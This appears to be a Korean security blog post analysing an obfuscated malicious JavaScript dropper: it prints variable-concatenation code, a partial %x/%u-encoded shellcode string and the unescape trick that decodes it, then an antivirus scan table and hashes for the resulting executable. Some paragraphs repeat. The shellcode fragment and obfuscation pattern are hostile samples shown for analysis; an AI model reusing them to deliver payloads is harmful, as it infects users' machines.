스크립트는 다음과 같이 이루어져 있다..
var NgGGQSmAX="%x9090%x90";var CFGqNAMIX="90%x5858%x5858%x10EB%x4B5B%xC9" 이와같이 조합하는 형식으로 되어있다... 그리고 스크립트 밑부분에 가면 다음과 같이 조합해야 나온다고 써져 있다.
var uavzoZkUK = NgGGQSmAX+CFGqNAMIX+VYsEvodWn+WsCqipvVq+ahIzciCgy+ZbwmiAEOg+
zqBGCuEDE+FwwSXiMop+XsvvwDgBP+BndYBlCki+TvWHkIIat+nPgYVTCOy+YYBaynGHm+
gCvdgGHkD+KwkIbOwZa+PNuvvHnXo+lVOUbMZEA+XsHMwMpAi+GiLFNlgSh+fIXQLfhCv+
WOWTldKTG+EgdiUIiHs+ZkxyQCQsT+nKxTsUHkt+FivWiGVyd+HOIIiFcmi+WavyYNIuk+
lIITIXpcx+ (중간코드 생략)+qsSygyuPc+IYXMvIdOi+HxUNZNCMz+yNxBikcOf+YdKHiWukf+IpOsiizZu+FwQFmbzkO+
XyUzoqImZ+gakgbQUgM+vHLGPHAif+XYYaiKqDc+FTeHtTTqL;uavzoZkUK = unescape(uavzoZkUK.replace(/\%x/g,"%u"));
모두가 더해지고서는 밑에 함수와 같이 %x 를 %u 로 바꿔 주어야만 최종 파일에 접근할 수 있다.
난 아직 잘 언어에 대해 잘 모르기 때문에 일일이 var 함수를 지우면서 나아가기 시작했다. 거의 막바지 지우던 도중 작성자가 힌트를 남겨주었다. 모든곳은 %x 로 시작하지만 막바지 부분에 %u 로 시작하는 부분이 발견된것이다.
%u 로 시작되는 코드를 복사해서 멀질라에서 돌려보면 최종 파일이 손쉽게 나올 수 있다.
물론 모든 %x 를 %u 리플레이스 해도 똑같이 위와 같은 결과가 나온다 !
하지만 이것은 거의 나같이 언어를 제대로 모르는 사람에게는 유용하지만 언어를 배워서 제대로 코드가 나오게 하는게 더욱 발전하는 길이 아닐까 생각이 된다 !
var NgGGQSmAX="%x9090%x90";var CFGqNAMIX="90%x5858%x5858%x10EB%x4B5B%xC9" 이와같이 조합하는 형식으로 되어있다... 그리고 스크립트 밑부분에 가면 다음과 같이 조합해야 나온다고 써져 있다.
var uavzoZkUK = NgGGQSmAX+CFGqNAMIX+VYsEvodWn+WsCqipvVq+ahIzciCgy+ZbwmiAEOg+
zqBGCuEDE+FwwSXiMop+XsvvwDgBP+BndYBlCki+TvWHkIIat+nPgYVTCOy+YYBaynGHm+
gCvdgGHkD+KwkIbOwZa+PNuvvHnXo+lVOUbMZEA+XsHMwMpAi+GiLFNlgSh+fIXQLfhCv+
WOWTldKTG+EgdiUIiHs+ZkxyQCQsT+nKxTsUHkt+FivWiGVyd+HOIIiFcmi+WavyYNIuk+
lIITIXpcx+ (중간코드 생략)+qsSygyuPc+IYXMvIdOi+HxUNZNCMz+yNxBikcOf+YdKHiWukf+IpOsiizZu+FwQFmbzkO+
XyUzoqImZ+gakgbQUgM+vHLGPHAif+XYYaiKqDc+FTeHtTTqL;uavzoZkUK = unescape(uavzoZkUK.replace(/\%x/g,"%u"));
모두가 더해지고서는 밑에 함수와 같이 %x 를 %u 로 바꿔 주어야만 최종 파일에 접근할 수 있다.
난 아직 잘 언어에 대해 잘 모르기 때문에 일일이 var 함수를 지우면서 나아가기 시작했다. 거의 막바지 지우던 도중 작성자가 힌트를 남겨주었다. 모든곳은 %x 로 시작하지만 막바지 부분에 %u 로 시작하는 부분이 발견된것이다.
%x7F11%xF6A4%x79BC%xA230%xEAC9%xB0DB%xFE42%x1103%xC066%x184D%xEF27%x1A43%x8367%x0BA0%x0584%x69D4%x03A6%xDBC2%x411D%x8A14%x2510%xADB7%x3D45%x126B%x4627%xA8EE%uD5DB%uC9C9%u87CD%u9292 (중략) %u858C%u878D%u8F85%u8F92%uD893%uD8C5%uBDBD%uBDBD%xBDBD%xBDBD%xBDBD%xBDBD%xBDBD%xBDBD%xBDBD%xBDBD
%u 로 시작되는 코드를 복사해서 멀질라에서 돌려보면 최종 파일이 손쉽게 나올 수 있다.
물론 모든 %x 를 %u 리플레이스 해도 똑같이 위와 같은 결과가 나온다 !
하지만 이것은 거의 나같이 언어를 제대로 모르는 사람에게는 유용하지만 언어를 배워서 제대로 코드가 나오게 하는게 더욱 발전하는 길이 아닐까 생각이 된다 !
최종 파일은 다음과 같은 곳 에서 진단이 된다.
File name:
2.exeSubmission date:
2011-03-06 10:06:33 (UTC)Result:
17/ 43 (39.5%)| Antivirus | Version | Last Update | Result |
|---|---|---|---|
| AhnLab-V3 | 2011.03.06.02 | 2011.03.06 | - |
| AntiVir | 7.11.4.71 | 2011.03.04 | - |
| Antiy-AVL | 2.0.3.7 | 2011.03.06 | - |
| Avast | 4.8.1351.0 | 2011.02.23 | - |
| Avast5 | 5.0.677.0 | 2011.03.05 | Win32:KillAV-KH |
| AVG | 10.0.0.1190 | 2011.03.06 | Klone.AP |
| BitDefender | 7.2 | 2011.03.06 | - |
| CAT-QuickHeal | 11.00 | 2011.03.06 | (Suspicious) - DNAScan |
| ClamAV | 0.96.4.0 | 2011.03.05 | - |
| Commtouch | 5.2.11.5 | 2011.03.05 | W32/Packed.Krap.A!Eldorado |
| Comodo | 7890 | 2011.03.06 | MalCrypt.Indus! |
| DrWeb | 5.0.2.03300 | 2011.03.06 | - |
| Emsisoft | 5.1.0.2 | 2011.03.06 | Packed.Win32.Krap!IK |
| eSafe | 7.0.17.0 | 2011.03.03 | - |
| eTrust-Vet | 36.1.8198 | 2011.03.04 | - |
| F-Prot | 4.6.2.117 | 2011.03.05 | W32/Packed.Krap.A!Eldorado |
| F-Secure | 9.0.16440.0 | 2011.03.06 | - |
| Fortinet | 4.2.254.0 | 2011.03.06 | - |
| GData | 21 | 2011.03.06 | - |
| Ikarus | T3.1.1.97.0 | 2011.03.06 | Packed.Win32.Krap |
| Jiangmin | 13.0.900 | 2011.03.06 | - |
| K7AntiVirus | 9.92.4032 | 2011.03.05 | Riskware |
| Kaspersky | 7.0.0.125 | 2011.03.06 | - |
| McAfee | 5.400.0.1158 | 2011.03.06 | - |
| McAfee-GW-Edition | 2010.1C | 2011.03.06 | Heuristic.LooksLike.Win32.Suspicious.F |
| Microsoft | 1.6603 | 2011.03.06 | PWS:Win32/Magania.gen |
| NOD32 | 5929 | 2011.03.06 | - |
| Norman | 6.07.03 | 2011.03.05 | W32/Viking.gen5 |
| nProtect | 2011-02-10.01 | 2011.02.15 | - |
| Panda | 10.0.3.5 | 2011.03.05 | Suspicious file |
| PCTools | 7.0.3.5 | 2011.03.06 | - |
| Prevx | 3.0 | 2011.03.06 | - |
| Rising | 23.47.06.03 | 2011.03.06 | Suspicious |
| Sophos | 4.63.0 | 2011.03.06 | Mal/EncPk-WO |
| SUPERAntiSpyware | 4.40.0.1006 | 2011.03.05 | - |
| Symantec | 20101.3.0.103 | 2011.03.06 | - |
| TheHacker | 6.7.0.1.145 | 2011.03.06 | - |
| TrendMicro | 9.200.0.1012 | 2011.03.06 | - |
| TrendMicro-HouseCall | 9.200.0.1012 | 2011.03.06 | - |
| VBA32 | 3.12.14.3 | 2011.03.04 | Malware-Cryptor.Inject.gen |
| VIPRE | 8613 | 2011.03.06 | Worm.Win32.Taterf.b (v) |
| ViRobot | 2011.3.6.4343 | 2011.03.05 | - |
| VirusBuster | 13.6.236.0 | 2011.03.05 | - |
|
Additional information
|
|---|
| MD5 : f2d695bb6baedbf2d749912725f2d30d |
| SHA1 : 5b9d67224b5c9247715424d20f66334922683636 |
| SHA256: 5d9c7e9aa4df220979880c71a97184c9ccd67321a1b6de1eab142fcc059e4e18 |
'security > 악성코드 유포' 카테고리의 다른 글
| V3lite.jpg 로 위장한 악성코드 !!!!!! (1) | 2011.06.05 |
|---|---|
| Eval 로 된 스크립트 간단하게 풀기 !! (1) | 2011.03.10 |
| DDos 국내 보안 전용 백신으로 치료 하세요 !! (0) | 2011.03.04 |
| 악성코드 유포되는 샘플을 보던중 !! imm32a.dll (5) | 2011.03.03 |
| 폴리뉴스 악성코드 유포 스크립트 간단하게 살펴보기.. !! (0) | 2011.02.19 |
